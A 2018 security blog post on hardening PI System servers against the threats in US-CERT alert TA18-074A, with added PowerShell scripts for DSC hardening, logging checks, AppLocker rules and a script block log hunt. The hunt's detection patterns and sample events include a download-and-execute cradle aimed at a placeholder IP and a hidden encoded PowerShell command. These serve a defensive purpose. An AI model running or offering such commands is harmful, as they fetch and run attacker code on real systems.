Security Blog, March 2018

There are a couple of options for learning about PI System hardening on day 3 of PI World 2018.

  1. The session Extreme PI System Hardening in developer track 4 at 10:30 AM is a “How-To” session that will take you step by step through hardening a system from the ground up.
  2. The PI System Anti-Hackathon lab at 1:30 PM is a “Hands-On” session where you can learn about system hardening by experimenting in a sandbox environment with experts to guide you.

Both sessions will make heavy use of the PI Security Audit Tools. Many are familiar with the audit module of the PI Security Audit Tools, which identifies gaps between the current state of a system and best practices. At PI World 2018, we will introduce the PI Security DSC module, which enables PI System administrators to manage the security configuration of their PI System components with PowerShell Desired State Configuration (DSC). With this module, PI System hardening can be implemented in a “configuration as code” paradigm: the desired state is written down once, applied by the DSC engine, and re-tested against drift.

Why use DSC for your PI System, you ask?

  • It’s declarative, separating intent, “What do I want to do?” from execution, “How do I want to do it?” This results in:
    • Less complex automation
    • More agility
    • Consistency across environments
    • Functional documentation
  • It’s broadly applicable, allowing you to cover a broad scope with the same technology:
    • Use with applications and the underlying OS
    • Establish baselines or harden systems
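As an added example (not code from the PI Security DSC module or from the original post), the configuration below shows the declarative style in plain PowerShell DSC, using only the PSDesiredStateConfiguration resources that ship with Windows PowerShell 5: it removes the SMBv1 server feature and sets the PowerShell logging policy values that the US-CERT alert further down this page asks for. The node name, output path and transcript folder are assumptions; the feature name, registry keys and value names are the documented ones.

```powershell
# Added example: a DSC configuration in the style the post describes, built only
# from the PSDesiredStateConfiguration resources that ship with Windows
# PowerShell 5. Node name, output path and transcript folder are assumptions.
Configuration PIServerHardening {
    param (
        [string[]] $NodeName = 'localhost',
        [string]   $TranscriptDir = 'C:\PSTranscripts'   # assumed; a central write-only share is better
    )
    Import-DscResource -ModuleName PSDesiredStateConfiguration

    $psPolicy = 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    Node $NodeName {
        # PI System core functionality does not need SMB; remove the SMBv1 server at a minimum.
        # (WindowsFeature requires a Server SKU with the ServerManager module.)
        WindowsFeature Smb1Removed {
            Name   = 'FS-SMB1'
            Ensure = 'Absent'
        }

        # Script block logging: full command text as event ID 4104 in Microsoft-Windows-PowerShell/Operational.
        Registry ScriptBlockLogging {
            Key       = "$psPolicy\ScriptBlockLogging"
            ValueName = 'EnableScriptBlockLogging'
            ValueType = 'Dword'
            ValueData = '1'
            Ensure    = 'Present'
            Force     = $true
        }

        # Module logging for every module: pipeline execution details as event ID 4103.
        Registry ModuleLogging {
            Key       = "$psPolicy\ModuleLogging"
            ValueName = 'EnableModuleLogging'
            ValueType = 'Dword'
            ValueData = '1'
            Ensure    = 'Present'
            Force     = $true
        }
        Registry ModuleLoggingNames {
            Key       = "$psPolicy\ModuleLogging\ModuleNames"
            ValueName = '*'
            ValueType = 'String'
            ValueData = '*'
            Ensure    = 'Present'
            Force     = $true
        }

        # Transcription: a text record of each session, with an invocation header, in a fixed folder.
        File TranscriptFolder {
            DestinationPath = $TranscriptDir
            Type            = 'Directory'
            Ensure          = 'Present'
        }
        Registry Transcription {
            Key       = "$psPolicy\Transcription"
            ValueName = 'EnableTranscripting'
            ValueType = 'Dword'
            ValueData = '1'
            Ensure    = 'Present'
            Force     = $true
        }
        Registry TranscriptionHeader {
            Key       = "$psPolicy\Transcription"
            ValueName = 'EnableInvocationHeader'
            ValueType = 'Dword'
            ValueData = '1'
            Ensure    = 'Present'
        }
        Registry TranscriptionFolder {
            Key       = "$psPolicy\Transcription"
            ValueName = 'OutputDirectory'
            ValueType = 'String'
            ValueData = $TranscriptDir
            Ensure    = 'Present'
        }
    }
}

# Compile to a MOF, apply it, then report anything that has drifted from the declared state.
PIServerHardening -NodeName 'PISRV01' -OutputPath 'C:\DSC\PIServerHardening'   # assumed node name and path
Start-DscConfiguration -Path 'C:\DSC\PIServerHardening' -Wait -Verbose -Force
Test-DscConfiguration -Detailed | Select-Object -ExpandProperty ResourcesNotInDesiredState
```

The same configuration, compiled with more names in -NodeName, is what gives the consistency across environments listed above, and Test-DscConfiguration (or a Local Configuration Manager set to ApplyAndMonitor or ApplyAndAutoCorrect) is the drift check. Transcripts contain whatever an administrator typed, including secrets passed on the command line, so the transcript folder needs an ACL that lets users append but not read or delete.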

Want to know more? Full descriptions of each PI World session are below.

 

How-To: Extreme PI System Hardening (Developer Track Presentation)

High-value systems warrant hardcore hardening measures. The PI System resides at a critical junction, communicating across strict network boundaries. Under this paradigm, the PI System acts as a 'safe harbor' for data, defending critical systems by reducing the number of users inside the security perimeter while enabling growth in the number of users getting value from OT data. An application can only be as secure as its operating platform, so this session will start from the ground up. We will establish a solid foundation with advanced hardening measures for the Windows operating system that OSIsoft has collected over many years of working with the platform, such as security baselines, PowerShell’s Desired State Configuration, and arcane corners of the Windows Advanced Firewall. With the platform locked down, we will explore application hardening measures built within and tailored to the PI System. Emphasis will be on using the latest technology and tools available to embrace agility and configuration as code. Examples from session demos will be available on GitHub for administrators who want to try them at home.

 

Hands-On: PI System Anti-Hackathon (PI System Admin Lab)

In this lab you will be served a big, soggy mess of a PI System – it’s your job to whip it into shape by applying modern security techniques and best practices. You will have some help: handy scripts to identify where the security holes are, references, resources, tips, and coaching to help you accomplish your task. Participants will earn points based on the number and the severity of security issues addressed. At the end of the lab, prizes will be awarded to top scorers. Moderately experienced administrators may have an advantage, but participants at all experience levels will learn concepts applicable to their systems back home.

 

Go here to register for the PI System Anti-Hackathon lab today!

US-CERT released the alert Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors (TA18-074A) on Thursday, March 15th, 2018. The technical alert includes indicators of compromise (IOCs), technical details on the tactics, techniques, and procedures (TTPs) used by the actors, and security best practices relevant to the campaign. DHS and FBI published this alert with the stated goal of empowering defenders to reduce their exposure to malicious activity.

 

Though the Systems Affected section of the alert explicitly identifies Domain Controllers, File Servers, and Email Servers as in scope, many of the defensive measures are relevant to the PI System as well.  The goal of this post is to highlight the measures in the General Best Practices Applicable to this Campaign section of the alert that are relevant to the PI System and point to resources that may assist with defensive efforts.

 

“Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.”

  • PI System core functionality does not require SMB; however, SMB is enabled by default on Windows and may be in use on your system for purposes unrelated to the PI System, so confirm which shares and SMB versions are actually used before blocking. For guidance on SMB and the PI System, see AL00318, WannaCry Ransomware Attack FAQ.

 

“Segment any critical networks or control systems from business systems and networks according to industry best practices.”

 

“Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.”

  • Most PI System administration tasks for the PI Data Archive and PI AF Server can be performed remotely with PI System Management Tools, PowerShell Tools for the PI System, or PI System Explorer over PINet. For remote administration of the OS, the MSDN blog post PowerShell Security at Enterprise Customers is a comprehensive overview of the security features that make PowerShell the best choice for that job. Given the manageability and security benefits, we recommend installing the PI Server on the latest release of Windows Server Core and performing remote administration via PowerShell. Note that script block logging records on the host where the code runs: in a PowerShell remoting session to a Server Core PI Server, the 4104 events are written on that server, so it, too, must forward its logs to the central repository.
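As an added example (not from the original post), the script below does two things a practitioner wants after reading the quote above: it confirms the three logging policies are set on this host, and it runs a small hunt over event ID 4104 script block records, first over constructed sample events and then over the live Microsoft-Windows-PowerShell/Operational log. The registry paths, log name, event IDs and property index are the documented ones; the indicator patterns and the sample events are my own and are only a starting point.

```powershell
# Added example (not from the original post): check the logging policy the alert
# calls for, then run a small hunt over script block events. The sample events
# are constructed; registry paths, log name and event IDs are the documented ones.

function Test-PowerShellLoggingPolicy {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
    $read = { param($sub, $name)
        (Get-ItemProperty -Path "$base\$sub" -Name $name -ErrorAction SilentlyContinue).$name
    }
    [pscustomobject]@{
        PSVersion          = $PSVersionTable.PSVersion          # the alert asks for 5.x
        ScriptBlockLogging = (& $read 'ScriptBlockLogging' 'EnableScriptBlockLogging') -eq 1
        ModuleLogging      = (& $read 'ModuleLogging'      'EnableModuleLogging')      -eq 1
        Transcription      = (& $read 'Transcription'      'EnableTranscripting')      -eq 1
    }
}

# Patterns typical of the tooling described in the alert; treat hits as leads, not verdicts.
$script:Indicators = @{
    'download cradle' = 'DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer'
    'encoded command' = '-EncodedCommand|-enc\b|FromBase64String'
    'dynamic eval'    = 'Invoke-Expression|\biex\b'
    'defense evasion' = 'Set-MpPreference|Add-MpPreference|-ExecutionPolicy Bypass|-w(indowstyle)? hidden'
}

function Get-SuspiciousScriptBlock {
    param ([Parameter(Mandatory)] [object[]] $Events)   # objects with TimeCreated, Id, ScriptBlockText
    foreach ($e in $Events) {
        if ($e.Id -ne 4104 -or -not $e.ScriptBlockText) { continue }
        $hits = foreach ($i in $script:Indicators.GetEnumerator()) {
            if ($e.ScriptBlockText -match $i.Value) { $i.Key }
        }
        if ($hits) {
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Indicators  = (@($hits) | Sort-Object) -join ', '
                Snippet     = $e.ScriptBlockText.Substring(0, [Math]::Min(70, $e.ScriptBlockText.Length))
            }
        }
    }
}

# Constructed sample: one ordinary PI administration command and two that should be flagged.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2018-03-16T09:12:00'; Id = 4104
                       ScriptBlockText = 'Get-PIPoint -Connection $con -Name sinusoid' }
    [pscustomobject]@{ TimeCreated = [datetime]'2018-03-16T09:15:00'; Id = 4104
                       ScriptBlockText = 'IEX (New-Object Net.WebClient).DownloadString(''http://203.0.113.5/a.ps1'')' }
    [pscustomobject]@{ TimeCreated = [datetime]'2018-03-16T09:16:00'; Id = 4104
                       ScriptBlockText = 'powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA' }
)
Test-PowerShellLoggingPolicy
Get-SuspiciousScriptBlock -Events $sampleEvents | Format-Table -AutoSize

# Same hunt over the live log. Properties[2] of a 4104 record is the ScriptBlockText field.
$liveEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                -MaxEvents 1000 -ErrorAction SilentlyContinue |
    ForEach-Object { [pscustomobject]@{ TimeCreated = $_.TimeCreated; Id = $_.Id; ScriptBlockText = $_.Properties[2].Value } }
if ($liveEvents) { Get-SuspiciousScriptBlock -Events $liveEvents | Format-Table -AutoSize }
```

On the sample input the first event produces no row and the other two are reported with their matching indicator names. Even with the policy off, PowerShell 5 still writes warning-level 4104 events for script blocks it considers suspicious, which is why an absent policy can look like "some logging"; only the policy setting gives complete coverage, and only central collection survives an attacker clearing the local log.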

 

“Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.”

  • We recommend installing PI Vision on the latest version of Windows Server Core for its reduced attack surface. Additionally, guidance for web security in PI Vision is covered in KB01631.

 

“Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.”

  • Guidance for configuring application whitelisting with AppLocker on systems running PI applications is provided in KB00994.
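As an added example (not from KB00994 or the original post), the script below generates an AppLocker executable rule collection from the alert's safe defaults, dry-runs it against real files with Test-AppLockerPolicy, and deploys it in AuditOnly mode so that breakage shows up as audit events rather than blocked PI services. It follows the alert in allowing SYSTEM32 rather than all of %WINDIR%, which is tighter than AppLocker's own default rule and may need widening after the audit period. The extra ICS path D:\PI\*, the XML output path and the probe file are assumptions; the AppLocker path variables, XML schema, cmdlets, service name and event IDs are the documented ones.

```powershell
# Added example (not OSIsoft's code): AppLocker EXE rules for the alert's safe
# defaults, tested in audit mode first. D:\PI\* and the file paths are assumptions.

function New-PathRuleXml {
    param ([string] $Path, [ValidateSet('Allow', 'Deny')] [string] $Action)
    $name = "$Action $Path" -replace '[&<>"]', '_'       # keep the XML attribute well formed
    '<FilePathRule Id="{0}" Name="{1}" Description="" UserOrGroupSid="S-1-1-0" Action="{2}"><Conditions><FilePathCondition Path="{3}" /></Conditions></FilePathRule>' -f
        [guid]::NewGuid(), $name, $Action, $Path
}

function New-PIAppLockerPolicyXml {
    param (
        # The alert's allow list; %PROGRAMFILES% covers both Program Files folders in AppLocker,
        # so default PI installs under Program Files\PI and Program Files\PIPC are included.
        [string[]] $AllowPaths = @('%PROGRAMFILES%\*', '%SYSTEM32%\*', 'D:\PI\*'),
        # Known user-writable folders under System32; deny rules win, so a binary dropped
        # there cannot ride on the System32 allow rule.
        [string[]] $DenyPaths  = @('%SYSTEM32%\Tasks\*', '%SYSTEM32%\spool\drivers\color\*'),
        [ValidateSet('AuditOnly', 'Enabled')] [string] $Mode = 'AuditOnly'
    )
    $rules = @($AllowPaths | ForEach-Object { New-PathRuleXml -Path $_ -Action Allow }) +
             @($DenyPaths  | ForEach-Object { New-PathRuleXml -Path $_ -Action Deny })
@"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="$Mode">
    $($rules -join "`n    ")
  </RuleCollection>
</AppLockerPolicy>
"@
}

$xmlPath = 'C:\DSC\PI-AppLocker.xml'                                   # assumed location
New-PIAppLockerPolicyXml | Set-Content -Path $xmlPath -Encoding UTF8

# Dry run against existing files: System32 (allowed), a PI binary if present (allowed),
# and a copy of cmd.exe planted in the user-writable Public folder (no rule: denied).
$probe = Join-Path $env:PUBLIC 'probe.exe'
Copy-Item -Path "$env:SystemRoot\System32\cmd.exe" -Destination $probe -Force
$samples = @("$env:SystemRoot\System32\cmd.exe", $probe) +
           @(Get-ChildItem -Path "$env:ProgramFiles\PIPC\bin" -Filter *.exe -ErrorAction SilentlyContinue |
               Select-Object -First 1 -ExpandProperty FullName)
Test-AppLockerPolicy -XmlPolicy $xmlPath -User Everyone -Path $samples |
    Format-Table FilePath, PolicyDecision, MatchingRule -AutoSize
Remove-Item -Path $probe -Force

# Apply locally in audit mode. AppLocker needs the Application Identity service; watch the
# Microsoft-Windows-AppLocker/EXE and DLL log for 8003 (would have been blocked) before
# switching -Mode to Enabled, where the same cases become 8004 (blocked).
sc.exe config appidsvc start= auto
Start-Service -Name AppIDSvc
Set-AppLockerPolicy -XmlPolicy $xmlPath
```

Path rules are only as strong as the ACLs on the allowed folders: a user who can write under Program Files or the ICS folder can run anything there, so verify those ACLs (and prefer publisher rules for signed PI binaries) before moving from AuditOnly to Enabled. Set-AppLockerPolicy without -Merge replaces the local policy; on domain-joined servers the usual deployment is through Group Policy instead.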

 

“Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.”

 

“Ensure applications are configured to log the proper level of detail for an incident response investigation.”

  • The default configuration already records a significant amount of information. See PI Data Archive monitoring in the LiveLibrary for details on the PI Data Archive monitoring capabilities available through PI Message Logs, connection history, and Windows performance counters. PI System administrators can opt into PI Auditing, which records data that is added, edited, or removed from database files, as well as other events and configuration changes in the PI Data Archive, to satisfy FDA Title 21 CFR Part 11 auditing requirements; see Auditing the PI Data Archive in the LiveLibrary for more information. Enabling PI Audit is not recommended unless the default monitoring is insufficient. PI AF Server client connectivity logging is covered in KB00412, and the PI AF Audit Trail is described in the Audit Trail implementation section of the LiveLibrary.

 

“Consider implementing HIPS or other controls to prevent unauthorized code execution.”

  • There are no known compatibility issues between host intrusion prevention systems (HIPS) and the PI System. Guidance for antivirus and antimalware solutions and the PI System is provided in KB01062.

 

“Establish least-privilege controls.”

  • Permissions required for tasks in the LiveLibrary describes permissions required for common administration tasks. A practical role-based access implementation for Windows Integrated Security in the PI System is described in the PI Data Archive Field Service Technical Standard in KB01702.

 

“Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.”

  • Since the PI System relies on Windows authentication through PI Mappings and runs its services under Windows accounts, resetting Windows principals will affect PI System components: services and interfaces running under a reset service account must be updated with the new credential, and a deleted and re-created account receives a new SID, so PI Mappings that referred to the old account no longer match. If this course of action needs to be taken, please contact tech support so that important aspects of recovery relevant to the PI System are not overlooked.

 

“Create and participate in information sharing programs.”

 

Hopefully the resources in this post help make the best practices relevant to this campaign more actionable for your PI System deployments.